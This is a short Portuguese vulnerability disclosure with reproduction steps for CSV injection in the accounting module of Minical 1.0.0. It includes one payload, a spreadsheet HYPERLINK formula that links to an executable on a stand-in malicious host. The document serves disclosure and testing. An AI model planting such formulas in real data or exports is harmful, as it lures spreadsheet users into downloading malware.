
Prova de conceito demonstrando vulnerabilidade de injeção CSV no Minical 1.0.0, com etapas de reprodução passo a passo e exemplo de payload.
Minical 1.0.0 é vulnerável a Injeção de CSV.
Fornecedor: https://github.com/minical/minical
Aplicação de Demonstração: https://demo.minical.io/
Passo 1: Navegue até o módulo de Contabilidade e clique em Criar Novo Cliente.

Passo 2: Insira o payload no campo Nome e clique em Criar.
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


Passo 3: Clique em Baixar Relatório CSV e observe o payload sendo renderizado.
